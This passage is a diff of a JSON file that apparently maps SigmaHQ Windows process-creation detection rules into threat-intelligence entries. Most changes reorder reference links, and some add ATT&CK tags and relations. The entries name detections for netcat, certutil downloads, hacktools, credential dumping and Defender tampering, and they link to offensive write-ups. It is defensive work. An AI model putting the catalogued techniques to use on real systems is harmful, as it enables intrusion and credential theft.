"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_by_ordinal.yml" ], "tags": [ @@ -67158,11 +68245,11 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://blog.sekoia.io/aurora-a-rising-stealer-flying-under-the-radar", - "https://github.com/redcanaryco/atomic-red-team/blob/a2ccd19c37d0278b4ffa8583add3cf52060a5418/atomics/T1082/T1082.md#atomic-test-25---system-information-discovery-with-wmic", "https://blog.cyble.com/2023/01/18/aurora-a-stealer-using-shapeshifting-tactics/", "https://nwgat.ninja/getting-system-information-with-wmic-on-windows/", "https://app.any.run/tasks/a6aa0057-82ec-451f-8f99-55650ca537da/", + "https://blog.sekoia.io/aurora-a-rising-stealer-flying-under-the-radar", + "https://github.com/redcanaryco/atomic-red-team/blob/a2ccd19c37d0278b4ffa8583add3cf52060a5418/atomics/T1082/T1082.md#atomic-test-25---system-information-discovery-with-wmic", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_recon_system_info_discovery.yml" ], "tags": [ @@ -67232,8 +68319,20 @@ "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/invoke-expression?view=powershell-7.2", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_iex_patterns.yml" ], - "tags": "No established tags" + "tags": [ + "attack.execution", + "attack.t1059.001" + ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "09576804-7a05-458e-a817-eb718ca91f54", "value": "Suspicious PowerShell IEX Execution Patterns" }, @@ -67250,9 +68349,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://learn.microsoft.com/en-us/windows/win32/secauthz/sid-strings", - "https://www.sans.org/blog/red-team-tactics-hiding-windows-services/", "https://itconnect.uw.edu/tools-services-support/it-systems-infrastructure/msinf/other-help/understanding-sddl-syntax/", + "https://www.sans.org/blog/red-team-tactics-hiding-windows-services/", + "https://learn.microsoft.com/en-us/windows/win32/secauthz/sid-strings", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sc_sdset_deny_service_access.yml" ], "tags": [ @@ -67285,8 +68384,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/vysecurity/status/977198418354491392", "https://github.com/vysecurity/Aggressor-VYSEC/blob/0d61c80387b9432dab64b8b8a9fb52d20cfef80e/ping.cna", + "https://twitter.com/vysecurity/status/977198418354491392", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ping_hex_ip.yml" ], "tags": [ @@ -67369,10 +68468,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.cybereason.com/blog/threat-analysis-report-bumblebee-loader-the-high-road-to-enterprise-domain-control", "https://learn.microsoft.com/en-us/sql/odbc/odbcconf-exe?view=sql-server-ver16", - "https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/", "https://www.hexacorn.com/blog/2020/08/23/odbcconf-lolbin-trifecta/", + "https://www.cybereason.com/blog/threat-analysis-report-bumblebee-loader-the-high-road-to-enterprise-domain-control", + "https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_odbcconf_response_file.yml" ], "tags": [ @@ -67405,12 +68504,12 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/", "https://hunter2.gitbook.io/darthsidious/other/war-stories/domain-admin-in-30-minutes", - "https://hunter2.gitbook.io/darthsidious/execution/responder-with-ntlm-relay-and-empire", "https://github.com/ohpe/juicy-potato", - "https://www.localpotato.com/", "https://pentestlab.blog/2017/04/13/hot-potato/", + "https://hunter2.gitbook.io/darthsidious/execution/responder-with-ntlm-relay-and-empire", + "https://www.localpotato.com/", + "https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_relay_attacks_tools.yml" ], "tags": [ @@ -67517,8 +68616,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/malmoeb/status/1665463817130725378?s=12&t=C0_T_re0wRP_NfKa27Xw9w", "https://www.autoitscript.com/site/", + "https://twitter.com/malmoeb/status/1665463817130725378?s=12&t=C0_T_re0wRP_NfKa27Xw9w", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_autoit.yml" ], "tags": [ @@ -67551,11 +68650,11 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.sans.org/blog/red-team-tactics-hiding-windows-services/", "https://twitter.com/Alh4zr3d/status/1580925761996828672", + "https://www.sans.org/blog/red-team-tactics-hiding-windows-services/", + "https://itconnect.uw.edu/tools-services-support/it-systems-infrastructure/msinf/other-help/understanding-sddl-syntax/", "https://twitter.com/0gtweet/status/1628720819537936386", "https://blog.talosintelligence.com/2021/10/threat-hunting-in-large-datasets-by.html", - "https://itconnect.uw.edu/tools-services-support/it-systems-infrastructure/msinf/other-help/understanding-sddl-syntax/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sc_sdset_modification.yml" ], "tags": [ @@ -67666,8 +68765,8 @@ "logsource.product": "windows", "refs": [ "https://twitter.com/gN3mes1s/status/1222088214581825540", - "https://twitter.com/gN3mes1s/status/1222095963789111296", "https://twitter.com/gN3mes1s/status/1222095371175911424", + "https://twitter.com/gN3mes1s/status/1222095963789111296", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_dctask64.yml" ], "tags": [ @@ -67747,10 +68846,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/dotnet/standard/data/xml/xslt-stylesheet-scripting-using-msxsl-script", "https://twitter.com/mattifestation/status/1326228491302563846", - "http://blog.sevagas.com/?Hacking-around-HTA-files", "https://0x00sec.org/t/clientside-exploitation-in-2018-how-pentesting-has-changed/7356", + "https://docs.microsoft.com/en-us/dotnet/standard/data/xml/xslt-stylesheet-scripting-using-msxsl-script", + "http://blog.sevagas.com/?Hacking-around-HTA-files", "https://medium.com/tsscyber/pentesting-and-hta-bypassing-powershell-constrained-language-mode-53a42856c997", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mshta_susp_execution.yml" ], @@ -67894,13 +68993,25 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://learn.microsoft.com/en-us/dotnet/api/microsoft.hpc.scheduler.store.cx509enrollmentwebclassfactoryclass?view=hpc-sdk-5.1.6115", "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=42", + "https://learn.microsoft.com/en-us/dotnet/api/microsoft.hpc.scheduler.store.cx509enrollmentwebclassfactoryclass?view=hpc-sdk-5.1.6115", "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=41", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_x509enrollment.yml" ], - "tags": "No established tags" + "tags": [ + "attack.defense_evasion", + "attack.t1553.004" + ] }, + "related": [ + { + "dest-uuid": "c615231b-f253-4f58-9d47-d5b4cbdb6839", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "114de787-4eb2-48cc-abdb-c0b449f93ea4", "value": "Suspicious X509Enrollment - Process Creation" }, @@ -67984,8 +69095,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://grzegorztworek.medium.com/using-uefi-to-inject-executable-files-into-bitlocker-protected-drives-8ff4ca59c94c", "https://persistence-info.github.io/Data/wpbbin.html", + "https://grzegorztworek.medium.com/using-uefi-to-inject-executable-files-into-bitlocker-protected-drives-8ff4ca59c94c", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wpbbin_potential_persistence.yml" ], "tags": [ @@ -68019,8 +69130,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wmic", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1047/T1047.md", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wmic", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_recon_process.yml" ], "tags": [ @@ -68086,8 +69197,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://learn.microsoft.com/en-us/windows-hardware/design/device-experiences/powercfg-command-line-options", "https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html", + "https://learn.microsoft.com/en-us/windows-hardware/design/device-experiences/powercfg-command-line-options", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powercfg_execution.yml" ], "tags": [ @@ -68111,8 +69222,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1136.001/T1136.001.md", "https://eqllib.readthedocs.io/en/latest/analytics/014c3f51-89c6-40f1-ac9c-5688f26090ab.html", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1136.001/T1136.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_net_user_add.yml" ], "tags": [ @@ -68180,8 +69291,8 @@ "logsource.product": "windows", "refs": [ "https://twitter.com/pabraeken/status/990717080805789697", - "https://lolbas-project.github.io/lolbas/Binaries/Runonce/", "https://twitter.com/0gtweet/status/1602644163824156672?s=20&t=kuxbUnZPltpvFPZdCrqPXA", + "https://lolbas-project.github.io/lolbas/Binaries/Runonce/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_runonce_execution.yml" ], "tags": [ @@ -68215,8 +69326,8 @@ "logsource.product": "windows", "refs": [ "https://mikefrobbins.com/2017/06/15/simple-obfuscation-with-powershell-using-base64-encoding/", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.001/T1059.001.md#atomic-test-20---powershell-invoke-known-malicious-cmdlets", "https://unit42.paloaltonetworks.com/unit42-pulling-back-the-curtains-on-encodedcommand-powershell-attacks/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.001/T1059.001.md#atomic-test-20---powershell-invoke-known-malicious-cmdlets", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_encode.yml" ], "tags": [ @@ -68316,8 +69427,8 @@ "logsource.product": "windows", "refs": [ "https://docs.microsoft.com/en-us/sysinternals/downloads/psexec", - "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html", "https://www.poweradmin.com/paexec/", + "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysinternals_psexec_remote_execution.yml" ], "tags": [ @@ -68350,8 +69461,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/Scripts/Cl_invocation/", "https://twitter.com/bohops/status/948061991012327424", + "https://lolbas-project.github.io/lolbas/Scripts/Cl_invocation/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_cl_invocation.yml" ], "tags": [ @@ -68384,8 +69495,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-e34e43eb5666427602ddf488b2bf3b545bd9aae81af3e6f6c7949f9652abdf18", "https://micahbabinski.medium.com/detecting-onenote-one-malware-delivery-407e9321ecf0", + "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-e34e43eb5666427602ddf488b2bf3b545bd9aae81af3e6f6c7949f9652abdf18", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_onenote_susp_child_processes.yml" ], "tags": [ @@ -68545,8 +69656,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/quarkslab/quarkspwdump", "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/seedworm-apt-iran-middle-east", + "https://github.com/quarkslab/quarkspwdump", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_quarks_pwdump.yml" ], "tags": [ @@ -68662,8 +69773,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.002/T1546.002.md", "https://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdf", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.002/T1546.002.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_screensaver.yml" ], "tags": [ @@ -68771,8 +69882,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md", "https://eqllib.readthedocs.io/en/latest/analytics/c4732632-9c1d-4980-9fa8-1d98c93f918e.html", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bcdedit_boot_conf_tamper.yml" ], "tags": [ @@ -68805,8 +69916,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/harr0ey/status/989617817849876488", "https://lolbas-project.github.io/lolbas/Libraries/Pcwutl/", + "https://twitter.com/harr0ey/status/989617817849876488", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_pcwutl.yml" ], "tags": [ @@ -69065,8 +70176,28 @@ "https://www.virustotal.com/gui/search/metadata%253ACube0x0/files", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_execution_via_pe_metadata.yml" ], - "tags": "No established tags" + "tags": [ + "attack.credential_access", + "attack.t1588.002", + "attack.t1003" + ] }, + "related": [ + { + "dest-uuid": "a2fdce72-04b2-409a-ac10-cc1695f4fce0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "37c1333a-a0db-48be-b64b-7393b2386e3b", "value": "Suspicious Hacktool Execution - PE Metadata" }, @@ -69104,7 +70235,7 @@ "value": "HackTool - Impacket Tools Execution" }, { - "description": "Detects suspicious start of rundll32.exe with a parent process of Explorer.exe. Variant of Raspberry Robin, as first reported by Red Canary.", + "description": "Detects execution of \"rundll32.exe\" with a parent process of Explorer.exe. This has been observed by variants of Raspberry Robin, as first reported by Red Canary.", "meta": { "author": "CD_ROM_", "creation_date": "2022/05/21", @@ -69116,8 +70247,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://redcanary.com/blog/raspberry-robin/", "https://thedfirreport.com/2022/09/26/bumblebee-round-two/", + "https://redcanary.com/blog/raspberry-robin/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_parent_explorer.yml" ], "tags": [ @@ -69125,7 +70256,7 @@ ] }, "uuid": "1723e720-616d-4ddc-ab02-f7e3685a4713", - "value": "Rundll32 With Suspicious Parent Process" + "value": "Rundll32 Spawned Via Explorer.EXE" }, { "description": "Detects the creation of a schtasks that potentially executes a payload stored in the Windows Registry using PowerShell.", @@ -69182,8 +70313,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.trendmicro.com/en_us/research/17/h/backdoor-carrying-emails-set-sights-on-russian-speaking-businesses.html", "https://learn.microsoft.com/en-us/sql/odbc/odbcconf-exe?view=sql-server-ver16", + "https://www.trendmicro.com/en_us/research/17/h/backdoor-carrying-emails-set-sights-on-russian-speaking-businesses.html", "https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_odbcconf_register_dll_regsvr_susp.yml" ], @@ -69218,8 +70349,8 @@ "logsource.product": "windows", "refs": [ "https://github.com/sensepost/ruler", - "https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=49", "https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html", + "https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=49", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_outlook_susp_child_processes_remote.yml" ], "tags": [ @@ -69260,11 +70391,11 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.microsoft.com/en-us/security/blog/wp-content/uploads/2023/03/Figure-7-sample-webdav-process-create-event.png", - "https://www.pwndefend.com/2023/03/15/the-long-game-persistent-hash-theft/", - "https://www.mdsec.co.uk/2023/03/exploiting-cve-2023-23397-microsoft-outlook-elevation-of-privilege-vulnerability/", "https://twitter.com/aceresponder/status/1636116096506818562", + "https://www.mdsec.co.uk/2023/03/exploiting-cve-2023-23397-microsoft-outlook-elevation-of-privilege-vulnerability/", "https://www.microsoft.com/en-us/security/blog/2023/03/24/guidance-for-investigating-attacks-using-cve-2023-23397/", + "https://www.pwndefend.com/2023/03/15/the-long-game-persistent-hash-theft/", + "https://www.microsoft.com/en-us/security/blog/wp-content/uploads/2023/03/Figure-7-sample-webdav-process-create-event.png", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_webdav_client_susp_execution.yml" ], "tags": [ @@ -69298,8 +70429,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/nas_bench/status/1618021838407495681", "https://twitter.com/nas_bench/status/1618021415852335105", + "https://twitter.com/nas_bench/status/1618021838407495681", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_vscode_child_processes_anomalies.yml" ], "tags": [ @@ -69408,8 +70539,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1110.002/T1110.002.md#atomic-test-1---password-cracking-with-hashcat", "https://hashcat.net/wiki/doku.php?id=hashcat", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1110.002/T1110.002.md#atomic-test-1---password-cracking-with-hashcat", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_hashcat.yml" ], "tags": [ @@ -69442,8 +70573,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Cmstp/", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.003/T1218.003.md", + "https://lolbas-project.github.io/lolbas/Binaries/Cmstp/", "https://eqllib.readthedocs.io/en/latest/analytics/e584f1a1-c303-4885-8a66-21360c90995b.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_cmstp.yml" ], @@ -69486,9 +70617,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/vysecurity/status/974806438316072960", "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/hh875578(v=ws.11)", "https://lolbas-project.github.io/lolbas/Binaries/Rpcping/", + "https://twitter.com/vysecurity/status/974806438316072960", "https://twitter.com/vysecurity/status/873181705024266241", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rpcping_credential_capture.yml" ], @@ -69664,8 +70795,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md#atomic-test-4---system-discovery-using-sharpview", + "https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1", "https://github.com/tevora-threat/SharpView/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_sharpview.yml" ], @@ -69731,9 +70862,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://github.com/hfiref0x/UACME", "https://medium.com/falconforce/falconfriday-detecting-uac-bypasses-0xff16-86c2a9107abf", "https://lolbas-project.github.io/lolbas/Binaries/Wsreset/", - "https://github.com/hfiref0x/UACME", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_wsreset_integrity_level.yml" ], "tags": [ @@ -69800,8 +70931,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wmic", "https://securelist.com/moonbounce-the-dark-side-of-uefi-firmware/105468/", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wmic", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_remote_execution.yml" ], "tags": [ @@ -69954,8 +71085,8 @@ "logsource.product": "windows", "refs": [ "https://www.revshells.com/", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1095/T1095.md", "https://nmap.org/ncat/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1095/T1095.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_netcat.yml" ], "tags": [ @@ -69988,11 +71119,11 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://forensicitguy.github.io/agenttesla-vba-certutil-download/", - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/certutil", - "https://news.sophos.com/en-us/2021/04/13/compromised-exchange-server-hosting-cryptojacker-targeting-other-exchange-servers/", "https://lolbas-project.github.io/lolbas/Binaries/Certutil/", + "https://forensicitguy.github.io/agenttesla-vba-certutil-download/", + "https://news.sophos.com/en-us/2021/04/13/compromised-exchange-server-hosting-cryptojacker-targeting-other-exchange-servers/", "https://twitter.com/egre55/status/1087685529016193025", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/certutil", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_certutil_download.yml" ], "tags": [ @@ -70059,8 +71190,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://posts.specterops.io/an-introduction-to-manual-active-directory-querying-with-dsquery-and-ldapsearch-84943c13d7eb?gi=41b97a644843", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1482/T1482.md", + "https://posts.specterops.io/an-introduction-to-manual-active-directory-querying-with-dsquery-and-ldapsearch-84943c13d7eb?gi=41b97a644843", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dsquery_domain_trust_discovery.yml" ], "tags": [ @@ -70093,9 +71224,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md", "https://ss64.com/ps/foreach-object.html", "https://ss64.com/nt/for.html", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_network_scan_loop.yml" ], "tags": [ @@ -70160,8 +71291,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.005/T1218.005.md", "https://eqllib.readthedocs.io/en/latest/analytics/6bc283c4-21f2-4aed-a05c-a9a3ffa95dd4.html", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.005/T1218.005.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mshta_javascript.yml" ], "tags": [ @@ -70327,8 +71458,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://h.43z.one/ipconverter/", "https://twitter.com/Yasser_Elsnbary/status/1553804135354564608", + "https://h.43z.one/ipconverter/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_obfuscated_ip_download.yml" ], "tags": [ @@ -70427,8 +71558,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.elevenforum.com/t/video-guide-how-to-completely-disable-microsoft-defender-antivirus.14608/page-2", "https://github.com/swagkarna/Defeat-Defender-V1.2.0", + "https://www.elevenforum.com/t/video-guide-how-to-completely-disable-microsoft-defender-antivirus.14608/page-2", "https://thedfirreport.com/2022/03/21/apt35-automates-initial-access-using-proxyshell/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_windows_defender_tamper.yml" ], @@ -70462,9 +71593,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://learn.microsoft.com/en-us/sysinternals/downloads/livekd", - "https://4sysops.com/archives/creating-a-complete-memory-dump-without-a-blue-screen/", "https://kb.acronis.com/content/60892", + "https://4sysops.com/archives/creating-a-complete-memory-dump-without-a-blue-screen/", + "https://learn.microsoft.com/en-us/sysinternals/downloads/livekd", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysinternals_livekd_kernel_memory_dump.yml" ], "tags": [ @@ -70510,8 +71641,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://thedfirreport.com/2020/10/08/ryuks-return/", "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker", + "https://thedfirreport.com/2020/10/08/ryuks-return/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_susp_process_creation.yml" ], "tags": [ @@ -70568,9 +71699,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/", "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/chm-badness-delivers-a-banking-trojan/", "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-27939090904026cc396b0b629c8e4314acd6f5dac40a676edbc87f4567b47eb7", - "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/", "https://www.zscaler.com/blogs/security-research/unintentional-leak-glimpse-attack-vectors-apt37", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hh_susp_execution.yml" ], @@ -70686,8 +71817,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://learn.microsoft.com/en-gb/windows-server/administration/windows-commands/ksetup", "https://twitter.com/Oddvarmoe/status/1641712700605513729", + "https://learn.microsoft.com/en-gb/windows-server/administration/windows-commands/ksetup", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ksetup_password_change_computer.yml" ], "tags": [ @@ -70712,11 +71843,11 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://jdhnet.wordpress.com/2017/12/19/changing-the-location-of-the-windows-event-logs/", + "https://eqllib.readthedocs.io/en/latest/analytics/5b223758-07d6-4100-9e11-238cfdd0fe97.html", "https://gist.github.com/fovtran/ac0624983c7722e80a8f5a4babb170ee", "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wevtutil", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.001/T1070.001.md", - "https://jdhnet.wordpress.com/2017/12/19/changing-the-location-of-the-windows-event-logs/", - "https://eqllib.readthedocs.io/en/latest/analytics/5b223758-07d6-4100-9e11-238cfdd0fe97.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_eventlog_clear.yml" ], "tags": [ @@ -70978,8 +72109,8 @@ "logsource.category": "process_creation", 